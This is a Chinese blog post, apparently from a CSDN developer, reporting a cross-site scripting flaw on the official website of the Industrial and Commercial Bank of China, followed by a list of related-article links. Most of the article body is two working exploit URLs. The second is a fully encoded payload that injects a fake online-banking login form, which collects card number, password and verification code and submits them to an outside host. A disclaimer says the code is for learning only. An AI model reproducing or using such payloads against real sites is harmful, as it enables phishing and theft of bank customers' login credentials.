工行官方站点出现严重漏洞

最新推荐文章于 2024-10-04 05:24:43 发布
最新推荐文章于 2024-10-04 05:24:43 发布
阅读量1.1k 收藏
点赞数
分类专栏: 网络安全 文章标签: c border javascript 金融 action function
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yustar/article/details/1473620
版权

 偶然间发现一篇文章介绍到工行的官方站点竟然有漏洞,本文代码均摘自http://www.phpobject.net/blog/read.php?82  主要的问题是跨域问题(XSS)还有就是对参数没有设置过滤,一个金融系统的网站尽然有如此问题有点让我害怕。

漏洞测试代码:

http://www.icbc.com.cn/click/adver/adver.jsp?para=javascript:test()";function%20test(){document.write('%B9%A4%D0%D0%BD%F4%BC%B1%CD%A8%D6%AA%A3%BA%B9%A4%D0%D0%D0%C2%CE%C5%CF%B5%CD%B3%B3%F6%CF%D6%D1%CF%D6%D8%C2%A9%B6%B4%A3%AC%D0%A1%D0%C4%B1%BB%C6%AD')}

还有一个更强的:

http://www.icbc.com.cn/click/adver/adver.jsp?para=%6A%61%76%61%73%63%72%69%70%74%3A%73%28%29%3B%66%75%6E%63%74%69%6F%6E%20%73%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%3C%74%69%74%6C%65%3E%D6%D0%B9%FA%B9%A4%C9%CC%D2%F8%D0%D0%D0%C2%D2%BB%B4%FA%CD%F8%C9%CF%D2%F8%D0%D0%3C%2F%74%69%74%6C%65%3E%3C%64%69%76%20%61%6C%69%67%6E%253Dcenter%3E%3Cform%20name%253Df%20action%253Dhttp%3A%2F%2Fwww%2E126%2Ecom%3E%3Ctable%20border%253D0%20width%253D400%3E%3Ctr%3E%3Ctd%20colspan%253D2%3E%3Cp%20align%253Dcenter%3E%3Cb%3E%3Cfont%20color%253D%2523FF0000%3E%B8%F6%C8%CB%CD%F8%C9%CF%D2%F8%D0%D0%D3%C3%BB%A7%B5%C7%C2%BC%3C%2Ffont%3E%3C%2Fb%3E%3Cp%20align%253Dcenter%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%D7%A2%B2%E1%BF%A8%2F%B5%C7%C2%BCID%A3%BA%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%253Dtext%20name%253Da%20size%253D19%20maxlength%253D19%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%B5%C7%C2%BC%C3%DC%C2%EB%A3%BA%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%253Dpassword%20name%253Db%20size%253D20%20maxlength%253D20%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%D3%D2%B2%E0%CF%D4%CA%BE%B5%C4%D1%E9%D6%A4%C2%EB%A3%BA%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%253Dpassword%20name%253Dc%20size%253D4%20maxlength%253D4%3E%2526nbsp%3B%3Cimg%20src%253Dhttps%3A%2F%2Fmybank%2Eicbc%2Ecom%2Ecn%2Ficbc%2Fperbank%2Fverifyimage%2Ejsp%3FrandomKey%253D1167791351382113206%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%20colspan%253D2%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%20colspan%253D2%3E%3Cp%20align%253Dcenter%3E%3Ca%20href%253Djavascript%3Adocument%2Ef%2Esubmit%28%29%3E%3Cimg%20src%253Dhttps%3A%2F%2Fmybank%2Eicbc%2Ecom%2Ecn%2Ficbc%2Fperbank%2Fimages%2Fagree%2Egif%20border%253D0%3E%3C%2Fa%3E%2526nbsp%3B%2526nbsp%3B%2526nbsp%3B%3Ca%20href%253Djavascript%3Adocument%2Ef%2Esubmit%28%29%3E%3Cimg%20src%253Dhttps%3A%2F%2Fmybank%2Eicbc%2Ecom%2Ecn%2Ficbc%2Fperbank%2Fimages%2Fdisagree%2Egif%20border%253D0%3E%3C%2Fa%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3C%2Fform%3E%3C%2Fdiv%3E%27%29%29%7D%2F%2F

以上代码均具有一定破坏性,只在学习提高网络安全意识。慎用,非法用途后果自负!!

其实这些都是小问题,在很多project中我们自己也会范这样的小问题,但问题就在于他是工商银行一个金融系统,真不知道他们的程序设计人员怎么考虑的,工作中没有质量安全控制吗?真危险!

yustar
关注
专栏目录
网银安全控件远程代码执行漏洞分析
gnaw0725博客
05-14 2513
5月11日,绿盟科技威胁响应中心接报乌云通告,工商银行安全控件可导致远程任意代码执行漏洞(WooYun-2015-96339),考虑到互联网金融当前存在较多的安全性问题 ,并考虑到该漏洞涉及到支付宝安全控件,可能的影响面较大,故迅速展开应急响应工作。
CSO 们关注的软件供应链安全十个关键问题
murphysec的博客
07-06 2269
这篇文章给大家分享一下我和超过 180 家各行业企业的安全负责人和一线的工程师们一起交流关于企业软件供应链治理问题过程的一些收获,把大家讨论和关心的共性问题做一些总结和提炼,也结合我自己在产品上的一些思考,分享给大家
[转载]PHP网站漏洞的相关总结
阿南的有趣吧
12-02 2759
从现在的网络安全来看,大家最关注和接触最多的WEB页面漏洞应该是ASP了,在这方面,小竹是专家,我没发言权.然而在PHP方面来看,也同样存在很严重的安全问题,但是这方面的文章却不多.在这里,就跟大家来稍微的讨论一下PHP页面的相关漏洞吧.    我对目前常见的PHP漏洞做了一下总结,大致分为以下几种:包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,SQL注入漏洞等几种.当然,至于COOKIE欺骗
XXX高校信息安全服务解决方案
打工人
04-11 3132
月度漏洞扫描 实时安全监测 季度安全巡检 渗透测试 代码审计 安全加固服务 应急响应 安全培训 安全通告 安全咨询
大事件-网络安全信息法-手把手教渗透详细教程
2401_84915584的博客
06-24 1251
近年来,以云计算、大数据、人工智能、物联网为代表的新兴技术的快速发展,网络安全风险全面泛化,复杂程度也在不断加深。特别是随着新冠肺炎疫情的蔓延,在加速企业数字化
商业银行的网上银行安全技术研究与设计(转载)
jialinniao的专栏
02-29 1810
1.       引言随着Internet技术与电子商务应用的不断发展和深入,商业银行提供网上支付服务已成为人们进行电子交易的基本手段和方法。在商业银行提高网上货币交易的方便性、快捷性的同时,如何确保网上银行的安全性、可靠性与保密性,已越来越受到人们的重视。我国的网上银行,一般都建立在传统的电子银行基础之上,其涉及的内容较为广泛,主要包括三个方面,一是通过支付网关,即B to C与B to
国内资深安全专家详谈Trojan-PSW盗号***
weixin_34324081的博客
05-04 3606
诚信网安--子明【51CTO.com 专家特稿】近日在QQ上广泛传播地一段回答问题得到q币中奖消息中所包含的恶意链接,访问该链接将导致用户电脑感染多种***程序,经过仔细分析这些***几乎都归于一类——Trojan-PSW***! 一、Trojan-PSW***的定义 近年来,网络犯罪和破坏更加趋向于能够给***者带来直接或间接的经济利益,像之前对纯技术的追求已经不那么明...
BS程序代码与安全与基本攻击/防御模式
childhooders的专栏
06-02 764
1.    引言1.1.     文档说明:1.2.     文档组织方式:2.    正文2.1.     SQL注入2.1.1.      攻击模式:2.1.2.      防御办法:2.2.     脚本注入2.2.1.      攻击模式2.2.2.      防御方式2.3.     跨站攻击2.3.1.      攻击模式2.3.2.
2023年最具影响力的十大网络安全事件
2301_76786857的博客
01-05 1189
2023年,网络攻击和数据泄露事件频繁发生,波及范围广泛,对全球知名企业组织构成了严重威胁,不仅受到监管合规压力,还面临社会舆情的负面影响。
盗号与钓鱼网站等网络安全问题原理与防范详解
最新发布
悦分享
10-04 98
在黑色产业链中,有人制作、销售工具,也有人专门从事诈骗活动。这些人建立的群体,关系并不是非常紧密的,可能仅仅是依靠QQ群或其他IM互相联系。因此打入这些人所在的圈子,并不是特别困难的事情,这样能掌握敌人的第一手资料。黑客们也有自己的群体,在社区里打听,也能得到一些有用的消息。
WIFI无线网络技术详细分析
热门推荐
wyqwilliam的博客
12-30 2万+
WIFI无线网络在无线局域网的范畴是指“无线相容性认证”,实质上是一种商业认证,同时也是一种无线联网技术,以前通过网线连接电脑,而无线保真则是通过无线电波来连网;常见的就是一个无线路由器,那么在这个无线路由器的电波覆盖的有效范围都可以采用无线保真连接方式进行联网,如果无线路由器连接了一条ADSL线路或者别的上网线路,则又被称为热点。 无线网络是一种能够将个人电脑、手持设备(如PDA、手机)等终端以无线方式互相连接的技术。Wi-Fi是一个无线网络通信技术的品牌,由Wi-Fi联盟(Wi-Fi Alliance
土地二级市场网上交易系统建设技术方案
珞圻的博客
02-29 1572
土地二级市场网上交易系统建设技术方案 目 录 1. 项目概述............................................................................................... 1 1.1. 建设背景.................................................................................... 1 1.2. 建设意义.....
泛游链FPCO白皮书
qq_41966805的博客
04-08 5437
 泛游链白皮书  重构传统游戏娱乐生态系统2018年4月4日 摘  要本白皮书阐述了作为新一代游戏新生态系统的泛游链的概念、设计和应用。 泛游链的核心团队研究并分析了当前的区块链技术和当前游戏产业的生态系统。发现了游戏发行商和玩家在游戏发行以及游戏行业生态系统面临的迫切问题,比如当前游戏宣传困难,资产流通和跨平台游戏。考虑到该行业的特点,泛游链提供了一个特定的解决方案:兼容和开放的生态系统。泛游链...
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 9090
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3622
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 7118
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
系统学习 TypeScript(四)——变量声明的初步学习
编程三昧
02-25 1757
认识了 TypeScript 中的基础类型,接下来当然是变量声明的相关学习了,我在这里记录一下我学习过程中的一些总结。
清除浮动的五种方法
weixin_52212950的博客
02-22 2731
为什么要清除浮动?因为往往浮动后的子元素因为脱离了标准流,不能自动撑起父元素的高度,所以会对后续布局产生影响,对此清除浮动不如理解为清除浮动产生的影响更为合理。 例如:我们设置了两个盒子如图所示,粉色为父盒子,只有宽度没有高度,蓝色盒子有宽有高,粉色盒子的高由蓝盒子的高度撑开。 但是给蓝色的子盒子设置了左浮动后,脱离了标准流,无法再撑开粉盒子,可以看到粉盒子高度变成了0; 清除浮动有五种方法: 直接设置父元素的高度 额外标签法 单伪元素法 双伪元素法 ove.
中国工商银行B2C在线支付接口详解
"中国工商银行网上银行新B2C在线支付接口文档" 中国工商银行的B2C在线支付系统是为商家提供的一种便捷、安全的电子商务支付解决方案。该系统允许消费者在其商户网站上选购商品或服务后,通过工商银行的网上银行进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值